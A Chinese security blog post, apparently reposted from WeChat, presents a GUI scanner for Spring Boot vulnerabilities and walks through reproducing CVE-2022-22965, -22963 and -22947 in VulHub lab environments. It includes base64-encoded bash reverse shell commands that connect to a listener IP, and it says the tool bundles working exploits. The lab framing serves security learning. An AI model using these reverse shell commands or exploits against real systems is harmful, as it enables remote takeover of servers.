🌟简介
开源工具 SpringBoot-Scan 的GUI图形化版本,作者13exp
注意:本工具内置相关漏洞的Exp,杀软报毒属于正常现象!
新版本工具使用
python3 main.py
VulHub 漏洞测试环境搭建
git clone https://github.com/vulhub/vulhub.git
安装Docker环境
sudo apt-get install docker.io
sudo apt install docker-compose
搭建CVE-2022-22965
cd /vulhub/CVE-2022-22965
sudo docker-compose up -d
搭建CVE-2022-22963
cd /vulhub/CVE-2022-22963
sudo docker-compose up -d
搭建CVE-2022-22947
cd /vulhub/CVE-2022-22947
sudo docker-compose up -d
如果报错,自行修改 .yml
文件中映射的端口号
漏洞复现演示
一、CVE-2022-22965
VulHub 环境复现
内置shell
aabysszg-shell
13exp-shell
春秋云境 环境复现
内置shell
13exp-shell
aabysszg-shell
二、CVE-2022-22963
VulHub 环境复现
准备反弹shell:
bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjAuMTA1Lzg4ODggMD4mMQ==}|{base64,-d}|{bash,-i} || (Base64)
编码内容→ bash -i >& /dev/tcp/192.168.0.105/8888 0>&1
Kali监听对应端口:
漏洞利用
春秋云境 环境复现
注:云境反弹shell需使用公网服务器
服务器监听
三、CVE-2022-22947
VulHub 环境复现
同样准备反弹shell
bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjAuMTA1Lzg4ODkgMD4mMQ==}|{base64,-d}|{bash,-i} || (Base64)
编码内容→ bash -i >& /dev/tcp/192.168.0.105/8889 0>&1
kali监听对应端口:
漏洞利用
春秋云境 环境复现
项目地址
https://github.com/13exp/SpringBoot-Scan-GUI
原文始发于微信公众号(SecHub网络安全社区):GUI版本SpringBoot漏洞扫描器
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论